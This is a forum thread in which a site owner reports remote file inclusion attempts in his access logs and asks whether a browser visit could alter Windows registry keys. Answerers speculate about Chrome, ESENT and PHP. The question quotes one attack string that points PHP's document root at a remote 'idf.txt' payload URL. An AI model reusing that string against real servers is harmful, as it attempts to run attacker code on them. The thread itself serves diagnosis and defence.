3

So I was browsing through my website access logs recently, and noticed several attempts to do things like this

?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/.../cms/idf.txt??

Of course, I'm not completely stupid and this had no affect on my server or the software, but I thought for the hell of it, I'd see what's actually on that domain. When it loaded, Chrome attempted to change a registry key according to Comodo. Is there any way to actually change a registry key from code that a browser runs or was it an unusual coincidence that Chrome, for the first time I've seen, tried to change a registry key.

Edit: 4 attempts at modification were made of different keys in HKLM/SYSTEM/ControlSet001/Services/ESENT

Jeff Atwood
  • 12,994
  • 20
  • 74
  • 92
Alex S
  • 393
  • 3
  • 6
  • 16

3 Answers3

1

I'd say it was a conicidence, although clever security holes cannot be ruled out either. It might help if you told us what the registry key was.

OK, I see your edit. (And why did Jeff change the registry key?) Let me rephrase - can we find out which exact registry keys they were and what exact values did it want to set?

Anyway, ESENT turns out to be some built-in database engine in Windows.

Now, it is possible, that the webpage used some security hole in Chrome and trough it attempted to hijack ESENT to gain full control of the system. Sounds fairly logical.

It is also possible that Chrome (or some plugin of it - say a video player) used ESENT in a legitimate way, and it was ESENT itself that wanted to change some of its registry keys.

Vilx-
  • 791
  • 4
  • 13
  • 25
0

The _SERVER[DOCUMENT_ROOT] makes me think it's trying to change what PHP believes the webserver's document root is in order to execute the PHP in the linked file. I wasn't aware you could do this, but maybe there's an exploit in some specific version of PHP?

Is it possible that Chrome modifies registry keys with or without visiting the URL, and that it's completely unrelated?

Collin Allen
  • 574
  • 1
  • 7
  • 16
0

Chrome has built in storage (Google Gears). Is it possible that its trying to store its local database in the registry?

semi
  • 726
  • 3
  • 7
  • 15